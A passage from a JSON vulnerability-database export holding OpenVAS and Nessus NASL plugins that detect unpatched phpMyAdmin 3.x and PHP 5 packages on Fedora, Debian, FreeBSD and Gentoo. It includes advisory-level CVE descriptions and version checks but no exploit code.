http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"ge 5.3.8\"), vulnerable: make_list(\"lt 5.3.8\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-12-02T15:42:54", "description": "Changes for 3.4.3.1 (2011-06-07)\n\n - [PMASA-2011-5] Possible session manipulation in Swekey authentication (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -5.php)\n\n - [PMASA-2011-6] Possible code injection in setup script in case session variables are compromised (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-6.php)\n\n - [PMASA-2011-7] Regular expression quoting issue in Synchronize code (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-7.php)\n\n - [PMASA-2011-8] Possible directory traversal (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-8.php)\n\nChanges for 3.4.3.0 (2011-06-27)\n\n - [sync] Missing helper icons in Synchronize\n\n - [setup] Redefine a lable that was wrong\n\n - [parser] master is not a reserved word\n\n - [edit] Inline edit updates multiple duplicate rows\n\n - [edit] Inline edit does not escape backslashes\n\n - [interface] Columns class sometimes changed for nothing\n\n - [interface] 
Some tooltips do not disappear\n\n - [search] Fix search in non unicode tables\n\n - [display] Inline query edit broken\n\n - [privileges] Generate password option missing on new accounts\n\n - [edit] Inline edit places HTML line breaks in edit area\n\n - [interface] Inline query edit does not escape special characters\n\n - [security] minor XSS (require a valid token)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-07-18T00:00:00", "type": "nessus", "title": "Fedora 14 : phpMyAdmin-3.4.3.1-1.fc14 (2011-9144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpmyadmin", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-9144.NASL", "href": "https://www.tenable.com/plugins/nessus/55604", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-9144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55604);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n script_bugtraq_id(48563);\n script_xref(name:\"FEDORA\", value:\"2011-9144\");\n\n script_name(english:\"Fedora 14 : phpMyAdmin-3.4.3.1-1.fc14 (2011-9144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Changes for 3.4.3.1 (2011-06-07)\n\n - [PMASA-2011-5] Possible session manipulation in Swekey\n authentication\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -5.php)\n\n - [PMASA-2011-6] Possible code injection in setup script\n in case session variables are compromised\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-6.php)\n\n - [PMASA-2011-7] Regular expression quoting issue in\n Synchronize code\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-7.php)\n\n - [PMASA-2011-8] Possible directory traversal\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-8.php)\n\nChanges for 3.4.3.0 (2011-06-27)\n\n - [sync] Missing helper icons in Synchronize\n\n - [setup] Redefine a lable that was wrong\n\n - [parser] master is not a reserved word\n\n - [edit] Inline edit updates multiple duplicate rows\n\n - [edit] Inline edit does not escape backslashes\n\n - [interface] Columns class sometimes changed for\n nothing\n\n - [interface] Some tooltips do not disappear\n\n - [search] Fix search in non unicode tables\n\n - [display] Inline query edit broken\n\n - [privileges] Generate password option missing on new\n accounts\n\n - [edit] Inline edit places HTML line breaks in edit\n area\n\n - [interface] Inline query edit does not escape special\n characters\n\n - [security] minor XSS (require a valid token)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=718964\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f35faca3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpMyAdmin-3.4.3.1-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:30:32", "description": "Several remote vulnerabilities have been discovered in PHP 5, an hypertext preprocessor. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2010-1917 The fnmatch function can be abused to conduct denial of service attacks (by crashing the interpreter) by the means of a stack overflow.\n\n - CVE-2010-2225 The SplObjectStorage unserializer allows attackers to execute arbitrary code via serialized data by the means of a use-after-free vulnerability.\n\n - CVE-2010-3065 The default sessions serializer does not correctly handle a special marker, which allows an attacker to inject arbitrary variables into the session and possibly exploit vulnerabilities in the unserializer.\n\n - CVE-2010-1128 For this vulnerability (predictable entropy for the Linear Congruential Generator used to generate session ids) we do not consider upstream's solution to be sufficient. It is recommended to uncomment the'session.entropy_file' and 'session.entropy_length' settings in the php.ini files. 
Further improvements can be achieved by setting'session.hash_function' to 1 (one) and incrementing the value of'session.entropy_length'.", "cvss3": {}, "published": "2010-08-23T00:00:00", "type": "nessus", "title": "Debian DSA-2089-1 : php5 - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2225", "CVE-2010-3065"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2089.NASL", "href": "https://www.tenable.com/plugins/nessus/48384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2089. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48384);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-1917\", \"CVE-2010-2225\", \"CVE-2010-3065\");\n script_bugtraq_id(40948, 41991);\n script_xref(name:\"DSA\", value:\"2089\");\n\n script_name(english:\"Debian DSA-2089-1 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP 5, an\nhypertext preprocessor. 
The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2010-1917\n The fnmatch function can be abused to conduct denial of\n service attacks (by crashing the interpreter) by the\n means of a stack overflow.\n\n - CVE-2010-2225\n The SplObjectStorage unserializer allows attackers to\n execute arbitrary code via serialized data by the means\n of a use-after-free vulnerability.\n\n - CVE-2010-3065\n The default sessions serializer does not correctly\n handle a special marker, which allows an attacker to\n inject arbitrary variables into the session and possibly\n exploit vulnerabilities in the unserializer.\n\n - CVE-2010-1128\n For this vulnerability (predictable entropy for the\n Linear Congruential Generator used to generate session\n ids) we do not consider upstream's solution to be\n sufficient. It is recommended to uncomment\n the'session.entropy_file' and 'session.entropy_length'\n settings in the php.ini files. Further improvements can\n be achieved by setting'session.hash_function' to 1 (one)\n and incrementing the value of'session.entropy_length'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-2225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2089\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny9.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libapache2-mod-php5\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php-pear\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-cgi\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif 
(deb_check(release:\"5.0\", prefix:\"php5-cli\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-common\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-curl\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-dbg\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-dev\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-gd\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-gmp\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-imap\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-interbase\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-ldap\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mcrypt\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mhash\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mysql\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-odbc\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-pgsql\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-pspell\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-recode\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-snmp\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-sqlite\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-sybase\", 
reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-tidy\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-xmlrpc\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-xsl\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:48:52", "description": "The remote host contains a version of phpMyAdmin - 3.3.x less than 3.3.10.2 or 3.4.x less than 3.4.3.1 - that is affected by multiple vulnerabilities :\n\n - An error in the file 'libraries/auth/swekey/swekey.auth.lib.php' allows an attacker to modify the 'SESSION' superglobal array.\n (CVE-2011-2505)\n\n - An error in the file 'setup/lib/ConfigGenerator.class.php' does not properly handle PHP comment-closing delimiters. This can allow an attacker inject static code via a modified 'SESSION' superglobal array. (CVE-2011-2506)\n\n - An error in the file 'libraries/server_synchronize.lib.php' does not properly call the 'preg_replace' function. This can allow an attacker to execute arbitrary code via a modified 'SESSION' superglobal array. 
(CVE-2011-2507)\n\n - An local file inclusion error exists in the 'PMA_displayTableBody' function in the file 'libraries/display_tbl.lib.php' that can allow an attacker to obtain sensitive information or execute code in file already present on the host.\n (CVE-2011-2508)", "cvss3": {}, "published": "2011-12-20T00:00:00", "type": "nessus", "title": "phpMyAdmin 3.3.x / 3.4.x < 3.3.10.2 / 3.4.3.1 Multiple Vulnerabilities (PMASA-2011-5 - PMASA-2011-8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2011_8.NASL", "href": "https://www.tenable.com/plugins/nessus/57346", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57346);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2011-2505\",\n \"CVE-2011-2506\",\n \"CVE-2011-2507\",\n \"CVE-2011-2508\"\n );\n script_bugtraq_id(48563);\n script_xref(name:\"EDB-ID\", value:\"17510\");\n script_xref(name:\"EDB-ID\", value:\"17514\");\n\n script_name(english:\"phpMyAdmin 3.3.x / 3.4.x < 3.3.10.2 / 3.4.3.1 Multiple Vulnerabilities (PMASA-2011-5 - PMASA-2011-8)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of phpMyAdmin - 3.3.x less than\n3.3.10.2 or 3.4.x less than 3.4.3.1 - that is affected by multiple\nvulnerabilities :\n\n - An error in the file\n 'libraries/auth/swekey/swekey.auth.lib.php' allows an\n attacker to modify the 'SESSION' superglobal array.\n (CVE-2011-2505)\n\n - An error in the file\n 
'setup/lib/ConfigGenerator.class.php' does not properly\n handle PHP comment-closing delimiters. This can allow\n an attacker inject static code via a modified 'SESSION'\n superglobal array. (CVE-2011-2506)\n\n - An error in the file\n 'libraries/server_synchronize.lib.php' does not properly\n call the 'preg_replace' function. This can allow an\n attacker to execute arbitrary code via a modified\n 'SESSION' superglobal array. (CVE-2011-2507)\n\n - An local file inclusion error exists in the\n 'PMA_displayTableBody' function in the file\n 'libraries/display_tbl.lib.php' that can allow an\n attacker to obtain sensitive information or execute\n code in file already present on the host.\n (CVE-2011-2508)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 3.3.10.2 / 3.4.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/02\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\ninstall_url = build_url(port:port,qs:dir);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER)\n exit(1, \"The version of phpMyAdmin located at \"+install_url+\" could not be determined.\");\n\nif (version =~ \"^3(\\.[34])?$\")\n exit(1, \"The version of phpMyAdmin located at \"+install_url+\" (\"+version+\") is not granular enough.\");\n\nif (\n # 3.3.x < 3.3.10.2\n version =~ \"^3\\.3\\.([0-9]|10(\\.[01]|$))($|[^0-9])\" ||\n # 3.4.x < 3.4.3.1\n version =~ \"^3\\.4\\.([0-2]|3(\\.0|$))([^0-9]|$)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.3.10.2 / 3.4.3.1' +\n '\\n';\n 
security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The phpMyAdmin \"+version+\" install at \"+build_url(port:port,qs:dir)+\" is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:43:00", "description": "The phpMyAdmin development team reports :\n\nIt was possible to manipulate the PHP session superglobal using some of the Swekey authentication code. This could open a path for other attacks.\n\nAn unsanitized key from the Servers array is written in a comment of the generated config. An attacker can modify this key by modifying the SESSION superglobal array. This allows the attacker to close the comment and inject code.\n\nThrough a possible bug in PHP running on Windows systems a NULL byte can truncate the pattern string allowing an attacker to inject the /e modifier causing the preg_replace function to execute its second argument as PHP code.\n\nFixed filtering of a file path in the MIME-type transformation code, which allowed for directory traversal.", "cvss3": {}, "published": "2011-07-05T00:00:00", "type": "nessus", "title": "FreeBSD : phpmyadmin -- multiple vulnerabilities (7e4e5c53-a56c-11e0-b180-00216aa06fc2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpmyadmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7E4E5C53A56C11E0B18000216AA06FC2.NASL", "href": "https://www.tenable.com/plugins/nessus/55502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted 
provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55502);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- multiple vulnerabilities (7e4e5c53-a56c-11e0-b180-00216aa06fc2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related 
